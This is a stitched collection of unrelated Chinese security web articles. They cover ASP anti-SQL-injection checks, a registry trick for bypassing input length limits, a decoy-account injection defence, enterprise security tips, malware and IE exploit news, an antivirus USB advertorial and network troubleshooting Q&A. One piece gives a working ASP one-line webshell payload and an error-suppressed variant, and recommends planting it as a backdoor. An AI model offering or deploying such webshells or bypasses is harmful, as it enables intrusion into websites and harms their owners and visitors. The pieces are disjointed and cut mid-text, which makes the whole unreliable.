个人感觉上面的代码过滤不是很好，有一些外部提交竟然还能堂堂正正的进来，于是再写一个。这个是过滤效果很好，建议使用。

if instr(request.servervariables

("http_referer"),"http://"&request.servervariables("host") )

本以为这样就万事大吉了，在表格页上加一些限制,比如maxlength啦,等等……但天公就是那么不作美，你越怕什么他越来什么。你别忘了，攻击者可以突破sql注入攻击时输入框长度的限制。写一个SOCKET程序改变HTTP_REFERER？我不会，网上发表了这样一篇文章：

------------len.reg-----------------

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\扩展(&E)]

@="C:\Documents and Settings\Administrator\桌面\len.htm"

"contexts"=dword:00000004

-----------end----------------------

-----------len.htm------------------

----------end-----------------------

用法：先把len.reg导入注册表(注意文件路径)然后把len.htm拷到注册表中指定的地方。打开网页，光标放在要改变长度的输入框上点右键，看多了一个叫扩展的选项了吧单击搞定! 后记：同样的也就可以对付那些限制输入内容的脚本了。怎么办？我们的限制被饶过了，所有的努力都白费了？不，举起你de键盘，说不。让我们继续回到脚本字符的过滤吧，他们所进行的注入无非就是进行脚本攻击。我们把所有的精力全都用到ACTION以后的页面吧，在chk.asp页中，我们将非法的字符全部过滤掉，结果如何？我们只在前面虚晃一枪，叫他们去改

简单三步走堵死 SQL Server 注入漏洞

作者：admin　来源：赛迪网技术社区

SQL注入是什么?

许多网站程序在编写时，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问)，根据程序返回的结果，获得某些想得知的数据，这就是所谓的SQL Injection，即SQL注入。

网站的恶梦——SQL注入

SQL注入通过网页对网站数据库进行修改。它能够直接在数据库中添加具有管理员权限的用户，从而最终获得系统管理员权限。黑客可以利用获得的管理员权限任意获得网站上的文件或者在网页上加挂木马和各种恶意程序，对网站和访问该网站的网友都带来巨大危害。

防御SQL注入有妙法

第一步:很多新手从网上下载SQL通用防注入系统的程序，在需要防范注入的页面头部用来防止别人进行手动注入测试。可是如果通过SQL注入分析器就可轻松跳过防注入系统并自动分析其注入点。然后只需要几分钟，你的管理员账号及密码就会被分析出来。

第二步:对于注入分析器的防范，笔者通过实验，发现了一种简单有效的防范方法。首先我们要知道SQL注入分析器是如何工作的。在操作过程中，发现软件并不是冲着“admin”管理员账号去的，而是冲着权限(如flag=1)去的。这样一来，无论你的管理员账号怎么变都无法逃过检测。

第三步:既然无法逃过检测，那我们就做两个账号，一个是普通的管理员账号，一个是防止注入的账号，为什么这么说呢?笔者想，如果找一个权限最大的账号制造假象，吸引软件的检测，而这个账号里的内容是大于千字以上的中文字符，就会迫使软件对这个账号进行分析的时候进入全负荷状态甚至资源耗尽而死机。下面我们就来修改数据库吧。

1.对表结构进行修改。将管理员的账号字段的数据类型进行修改，文本型改成最大字段255(其实也够了，如果还想做得再大点，可以选择备注型)，密码的字段也进行相同设置。

2.对表进行修改。设置管理员权限的账号放在ID1，并输入大量中文字符(最好大于100个字)。

3.把真正的管理员密码放在ID2后的任何一个位置(如放在ID549上)。

我们通过上面的三步完成了对数据库的修改。这时是不是修改结束了呢?其实不然，要明白你做的ID1账号其实也是真正有权限的账号，现在计算机处理速度那么快，要是遇上个一定要将它算出来的软件，这也是不安全的。我想这时大多数人已经想到了办法，对，只要在管理员登录的页面文件中写入字符限制就行了!就算对方使用这个有上千字符的账号密码也会被挡住的，而真正的密码则可以不受限制。

一句话木马的变形变２句话马的好处

今天无意在一个站点看到了关于一句话木马的变形变２句话马的文章（应该是很久之前的文章了吧，但是我还是很少见到有人用这种方法去插入我们的小马，现在觉得对大家很有用，所以自己做了点修改，就发了上来（这里说的两句话木马其实是一句话木马的变形）

一句话木马服务端原型:＜%execute request("value")%＞ ,

变形后:＜%On Error Resume Next execute request("value")%＞ ,

学过ＡＳＰ或者ＶＢ的朋友应该都知道On Error Resume Next的意思吧，（遇到错误不停止，向下运行别的程序）

这样写的好处在于，访问被插入该页面的时候，很少会出现异常，而用一句话的时候就不是这样了，都是会出现异常滴....

所以说建议大家以后写入一句话后门时候还是转为插入２句话后门的好，思路有很多，自己想吧.

八种手段轻松打造安全高效的上网环境

八种手段轻松打造安全高效的上网环境

作者：lvvl　来源：赛迪网安全社区

这是一个充满变革的时代，94年一条64k的数据线第一次将我国接入世界，到今天，从政府、企业、医疗、教育……各行各业都广泛的使用互联网来获取无数的信息和机会。对多数企业来说，互联网不仅带来了丰富的网上资源，也把信息化带进了企业，使得企业传统运作方式迎来了深刻的变革。互联网极大地陈低了组织的运营和沟通成本，利用互联网，大多数员工可以更高效率的完成工作。

但是，作为一把“双刃剑”，互联网也给组织和企业带来前所未有的威胁。全天候24小时在网络上流动的内容当中，存在着太多的风险：垃圾邮件、恶意网站、网上欺诈、网络病毒等无时无刻不在困扰着互联网用户，而另外一方面，网络滥用行为，包括恶意的p2p下载、网络游戏、im等娱乐应用挤占了组织有限的业务带宽，同样导致网络应用效率低下。

那么，如何绕开这些互联网弊端，充分享受互联网给组织带来的方便与高效，从而全方位打造安全高效的上网环境呢？下面8种手段或许能给你答案。

一、提升边界防御

防火墙、IDS、IPS，是解决网络安全问题的基础设备，他们所具备的过滤、安全功能能够抵抗大多数来自外网的攻击。配备这些传统的网络防护设备，实现面向网络层的访问控制，是企业安全上网的前提。然而，在应用内容及其格式以爆炸速度增长的今天，许多互联网危害隐患存在于应用层中，仅仅依照第三层信息决定其是否准入，根本无法满足安全的要求，我们还需要细粒度的应用层策略控制。

IDC的调查报告显示，至2006年，有超过90％的病毒将互联网作为其传播入口，通过电子邮件和网络进行病毒传播的比例正逐步攀升，在网络入口处把住病毒入侵的关口成了当务之急，因此，除了上述的防火墙、IDS、IPS等基础安全设备，你还需要部署一个有效的网关级杀毒引擎。

二、上网终端管理

网络边缘的外围设备再先进也无法保护内部网络，来自局域网内部的滥用、破坏也是威胁上网安全的重要因素。比如，客户端的安全级别往往难以保证，这对于内网用户数量众多的组织更为如此——缺乏安全措施的单机，比如使用陈旧的操作系统、长时间不更新个人防火墙和杀毒软件、应用具有潜在安全漏洞的软件，都将成为局域网安全中一颗颗隐藏的定时炸弹。

为上网终端配置网络准入规则，通过对单点的安全评估和访问策略列表是实现客户端全方位安全防护的最佳手段。对终端的安全策略列表应该包括操作系统、运行程序、系统进程、注册表等。

三、有害内容过滤

互联网是一个不可控的黑洞，无数不怀好意的网站使你上网冲浪时如履薄冰：隐藏蠕虫病毒、木马插件的非法网站，各类层出不穷的钓鱼网站……都会让组织在分享互联网便利的同时带来巨大的隐患。

针对这些有害内容，URL库过滤技术近年来得到广泛采纳，采用该技术将包含潜在威胁的网站拦截在外是保障上网安全的有效方式之一，当然，还应该考虑到一些钓鱼网站采用的是SSL加密页面，所以还需要结合证书验证、链接黑白名单等措施。对文件下载传输行为进行规范也是必要的，将关键字、文件类型、网络服务与IP地址组进行关联，规范下载策略，可以控制大部分由主动下载造成的损害。

四、垃圾邮件过滤

还有一些不那么“有害”的信息——垃圾邮件，虽然未必会造成安全隐患，但却能导致带宽利用率，更重要的是工作效率的低下。

为了最大程度的减少这些影响带宽利用率及工作效率的无用信息，必须找到一种区分垃圾邮件、正常邮件、可疑邮件的有效手段，比如垃圾邮件指纹识别技术，减少误判的随机特征码智能应答技术等。

五、优化带宽资源

不管采取什么方式上网，带宽终究是有限的，在无法改变带宽的前提下，如何优化带宽资源，使其效率最高，是必须解决的问题。但现实的问题是，网管员对自己单位内部的带宽有效利用情况无从获知，就更谈不上改善了。

要做到优化带宽资源，首先要考察内网网络使用情况，并形成可供决策的报表，有些厂商提供的数据中心就已经可以提供丰富的报表分析功能。另外，针对网内一些重要的网络服务，也有必要启用qos技术，从而保证重要的服务先行，避免垃圾流量挤占重要服务的带宽。

六、全面应用管理

全球每天有120亿条消息通过即时通讯工具（Instant Messaging，IM）被发送，这些IM应用也许是员工在和同事、客户讨论工作，但更多的聊天对象却是家人、朋友甚至是陌生人。此外，网络上还有其它大量的和工作无关网络应用存在，包括网络游戏、在线炒股、P2P下载等，这些工作时间内的“丰富应用”造成了组织生产效率的巨大浪费。有些组织靠封端口、封服务器地址等方法在一定程度上有效，但由于服务器地址和端口会经常变换，这导致封服务器地址和端口成为一项持续的高成本工作，只能是治标不治本。

在全面应用管理上更有效的封堵方法主要有两种，一种是基于应用协议和数据包的智能分析，另一种是针对流量进行检测。前者是通过分析IP数据包首部的服务类型、协议、源地址、目的地址以及数据包的数据部分，能够更好的发现特定服务。后者则可以针对特定用户的网络连接情况进行分析，当网络流量和网络连接超出规定的阀值时，用户的行为将被限制流量。

互联网协会将公布恶意软件黑名单

天极yesky

　　中国互联网协会负责人今天表示,将于四月或五月期间向社会公布一批恶意软件及其制造者名单,目前包括一些国际知名厂商在内的网络公司或软件公司正在对各自旗下被举报产品进行改进.

　　去年下半年,中国互联网协会公布了恶意软件的八个特征,如强制安装、难以卸载等,共收到一千二百起的网民举报.

　　中国互联网协会行业自律工作委员会秘书长杨君佐接受采访时说,协会接到这些举报后,首先由技术组进行初步判断,属于恶意软件的,通知被举报部门整改,两周后出具整改报告,坚持不整改的将向网民和病毒制造商公布名单,不过黑名单的发布也会比较慎重.

　　目前已被发现的恶意软件有一百三十种.杨君佐说,由于恶意软件尚未立法,现在对恶意软件造者还没有惩处办法,管理上主要依赖于行业自律.

　　关于惩处恶意软件制造者,在此前的两会上,已有政协委员提出对恶意软件进行立法.民建中央信息技术小组秘书长、政协委员何春潮说,政协民建团提交的关于制定《恶意软件惩治办法》的提案共提出六点建议,包括惩戒恶意软件制造者和受益者、规范查杀软件、设立举报中心、成立应急处理中心等.

　　业内人士表示,对恶意软件立法将会是一个比较长的过程,今后很有可能以部门规章的形式出现,或者对现有的《软件产品管理办法》和《计算机病毒防治管理办法》进行修订.

　　何春潮介绍,美国有十九个州通过了对恶意软件的立法,欧盟也颁布了《网络刑事公约》,对网络犯罪规定了罪名和刑罚.

新IE漏洞代码出现!新版IE 7不受影响

出处：PConline

作者：BlackWing

　　在网上已经出现了能利用IE中已有的漏洞的软件。这个软件在周二被公布在milw0rm.com上，它利用的是最近被微软修复了的一个浏览器的漏洞。

　　安全专家警告，通过这个漏洞攻击者可以在被攻击电脑上运行未经过授权的软件。这个隐患由安全研究人员HD Moore在去年7月发现，此隐患会导致浏览器的崩溃。微软在2月已经修复了这个问题，但安全研究人员表示，由于这个新出现的利用代码，此漏洞会引起更多犯罪分子的注意。

　　eEye Digital Security公司的研究人员表示，milw0rm.com上公布的代码对IE 6有效，但并不会影响微软最新版的浏览器。eEye预览研究服务的主管Andre Protas表示，它们针对IE 7进行了测试，结果显示IE 7不受影响。

　　Protas表示，更危险的利用代码很有可能会在不久出现。详细的利用代码可以到这里查看。

用U盘保护系统 亲身经历另类杀毒经验

用U盘保护系统　亲身经历另类杀毒经验

作者：金山　来源：赛迪网

近来电脑总是不正常，上网特别慢、运行一会就蓝屏，真怀疑是不是中了病毒。

某天趁着休息，赶到电脑城打算给电脑买套杀毒软件。在电脑城里，国内国外的杀毒软件应有尽有，促销员的介绍更是让我心动，可是一想到家里机器配置不高，顿时让我的热情大打折扣。由于杀毒软件都有庞大的数据库，装上杀毒软件后，肯定会拖慢游戏的速度，不禁让我打起退堂鼓来。

看出我的顾虑后，观察细微的店家向我推荐了金山的杀毒Ｕ盘，说是差不多的价格既买了杀毒软件还有Ｕ盘用了，而且金山毒霸还能保护U盘数据不受病毒破坏、跟难得的是，用金山毒霸杀毒U盘给电脑杀毒基本不用占用太多系统资源。呵呵，当时我心里不禁窃喜起来。



按捺不住激动的心情，想看看这Ｕ盘怎么杀毒。回到家马上打开包装把它插入了USB接口，和普通U盘不同的是，屏幕右下角出现的是2个图标，而不是1个图标,见图。一个是传统的USB图标，另外一个是金山毒霸的图标，提示金山毒霸Ｕ盘版文件监控已启动。　



U盘怎么杀毒呢？让我们一起来看看。在文件监控点击左键选择启动“毒霸Ｕ盘版主程序”，见图。



金山毒霸Ｕ盘版终于露出了庐山真面目，整个界面简洁朴素。



直接点击“开始查杀”，就开始检测我的系统了，没有任何烦琐的步骤。



而且查杀病毒结束后，还有详细的查毒报告，让你对操作一目了然。



哈哈，这个东东对于偶尔需要查杀病毒的我来说使用真是太方便了！

高兴之余看到病毒库的版本还是去年的，想到赶紧更新下病毒库 这样杀毒才有效果。可是自己的电脑运行速度慢那得等上多久啊，回想到店员曾介绍说这个U盘可以在任一一台联网的pc上更新病毒库， 于是想到朋友那网速快而且还能给他看看我这新武器。

一溜烟跑到了朋友那说明原委后准备更新了，连上网插上杀毒U盘后运行“在线升级”，只停顿了一两秒钟就开始下载文件了，不一会功夫提示升级完成，主界面上病毒库的日期已经是今天的了。见下图：



我这朋友虽然也是从事IT行业，但也对我这新东西－杀毒U盘充满好奇。说是以前都是简单的将杀毒程序在拷贝到U盘上用， 但升级比较麻烦而且还可能不小心被删除掉。看到这个家伙一直在啧啧称奇，心里别提多得意了。

呼地想起Ｕ盘好像还有个“文件监控”功能可以防止病毒文件拷入U盘呢，两人琢磨怎么试试这个功能。 从本地磁盘拷贝了个执行文件 正常的windows复制框转眼就完成并没有什么特殊的提示 又拷贝了个文件夹还是一样。 看来我这朋友用电脑比我规律多了，系统还真是干净。这下只好求助于网络了，搜索一番后终于找到了传闻中的病毒样本。

现在就动手， 小心翼翼的打开压缩包把文件发送到移动磁盘，右下角马上就弹出发现病毒消息框 见图。再试试在U盘里直接解压缩呢，同样起到了作用。





“文件监控”真的把我的Ｕ盘保护起来了，现在使用Ｕ盘和朋友们共享数据就没有后顾之忧了。带着朋友的称赞和资料满载而归！

金山毒霸杀毒Ｕ盘还有其它丰富的扩展功能，如文件粉碎器和支持简繁体等等　这里我就不再一一列举。希望你有机会可以亲自试试，一定让你惊奇的！

总之，这款金山毒霸杀毒Ｕ盘，无论是在做工上还是软件设置上，都比较人性化，功能也非常完善，可以防范和查杀网络安全领域目前几乎所有的病毒，并且Ｕ盘数据提供的保护，刚好是我想要的。

网络安全应用不求人 故障与技巧集锦

作者：hanbin　来源：赛迪网技术社区

DNS代理故障

读者KAIX：公司网络内有一台拨号服务和一台域管理服务器，在拨号时使用ping命令，总是发生丢包现象。取消DNS代理后，情况马上恢复正常。QQ连接使用正常，但网页打不开。请问，这可能是什么原因造成的?既然取消DNS代理后问题得以解决，估计是DNS代理或选择的DNS服务器有问题。实际上，不管使用何种代理服务器或防火墙，只要允许DNS端口通讯，就可以直接使用外网的DNS服务器，而无须使用DNS代理。另外，既然QQ可以连接，只是不能访问Web网站，说明Internet连接没有问题，而故障的原因，自然就是DNS解析故障。事实上，QQ可以直接指定服务器的IP地址，而无需经过DNS解析。上网导致死机 读者风光：我的电脑是ADSL上网。不上网时工作正常。只要一上网，电脑很快就会死机。只能按Reset重启。电脑是TCL锐翔K3681。Modem是华为SmartAX MT800。系统是Windows XP，用星空极速2.0客户端，重装系统和网卡驱动也没用。应当如何解决?导致电脑死机有很多种原因。

建议采用以下方法进行判断：

第一、先让ADSL拨号连接到ISP，但不打开IE，也不运行QQ之类的Internet应用软件。如果能够稳定运行，而不会死机，说明Internet连接没有问题。

第二、如果只要ADSL拨号就死机，说明是ADSL与计算机不兼容。可能是网卡或ADSL硬件故障，也有可能是PPPoE协议或驱动程序软件故障。可以采取的措施包括：

* 卸载星空极速2.0客户端，使用Windows XP内置的ADSL拨号程序。

* 将ADSL设置为路由方式，而不采用虚拟拨号方式。

* 更换网卡插槽，或更换新的网卡。

* 更换ADSL Modem。

第三、如果在打开Internet Explorer并浏览网页时死机，说明是Internet Explorer或操作系统有问题，建议重新安装或修复系统。

第四、也有可能是感染了蠕虫病毒，建议安装系统补丁和病毒防火墙。

无法显示自定义表情

读者ajksd：我的QQ在发送或接收自定义表情时会出现“卡机”现象，过几分钟后就好了。不过，自定义表情和图片对方仍然收不到，别人发过来的也打不开。将天网和Windows自带的防火墙关掉以后，再试仍然不行。可能是什么原因?应当如何解决?导致该故障的原因可能是Internet连接速度太慢，建议更换Internet接入方式或者Internet共享方式。当经过2级以上的代理服务器或宽带路由共享Internet连接时，将无法收到并显示图片。可以更换ADSL或小区宽带等宽带Internet接入方式，或者取消2级以上代理的连接共享方式，甚至试着直接拨号上网。如果问题解决，说明是上网方式的问题。

被恶意网站修改主页

读者diker：有一次通过搜索链接到了某个网站后，该网站就自动成了我的主页，连Internet选项中的主页项也变成了这个网站，并且灰化了。我用QQ聊天时，每次开始和人聊，就会现有这么一段话“你为什么要骂我?我哪里惹你了?我希望你对你的留言负责。你自己来给我解释，hxxp://恶意网站的URL”。后来，采用手动修改注册表的方法，修改了

HKEY_LOCAL_USER\Software\Microsoft\InternetExplorer\Main

中的StartPage键值名(用来设置默认首页)，仍然无法解决。应当如何处理?

导致该故障的原因是感染了脚本漏洞病毒，可以使用新版本的Symantec、KV2005来清除，或者借助3721的上网助手(hxxp://www.3721.com)来解决。由于许多病毒都在自动运行键值中设置了注册表恢复，因此，仅仅修改上述键值是不够的，还必须查看并修改HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run项，删除不必要的应用程序。另外，建议将Internet Explorer升级至6.0+SP1，并且更新系统的补丁。需要注意的是，如果系统是Windows 98，一定要升级到Internet Explorer6.0+SP1，如果系统是Windows2000/XP，则一定要及时升级系统补丁。作为一个临时解决方案，可以用“记事本”程序修改c：\WINDOWS\system32\drivers\etc\hosts文件，在里面添加如下一行：127.0.0.1 恶意网站的URL 或者把其中的127.0.0.1换为其他默认主页的IP地址。